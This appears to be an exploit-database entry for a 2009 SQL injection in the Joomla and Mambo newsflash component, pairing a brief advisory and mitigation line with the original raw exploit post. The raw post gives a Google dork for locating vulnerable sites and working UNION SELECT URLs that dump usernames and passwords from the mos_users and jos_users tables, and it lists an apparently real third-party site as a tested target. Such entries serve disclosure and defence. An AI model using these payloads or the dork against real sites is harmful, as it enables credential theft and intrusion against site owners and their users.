Joomla newsflash Sql injection

vendor:

Newsflash

by:

EcHoLL

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Newsflash

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Joomla newsflash Sql injection

An SQL injection vulnerability exists in the Joomla and Mambo newsflash component. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerable parameter is the 'id' parameter in the 'com_newsflash' component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable web application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#Joomla newsflash Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name:  newsflash
#[!] Script_Name: mambo and joomla
#[!] Google_Dork: inurl:"com_newsflash"
########################################
sqlcode:index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
 
mambo target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
 
joomla target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+jos_users&catid=0
 
 
tested page
http://www.flairsoft.net/main/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0

# milw0rm.com [2009-01-11]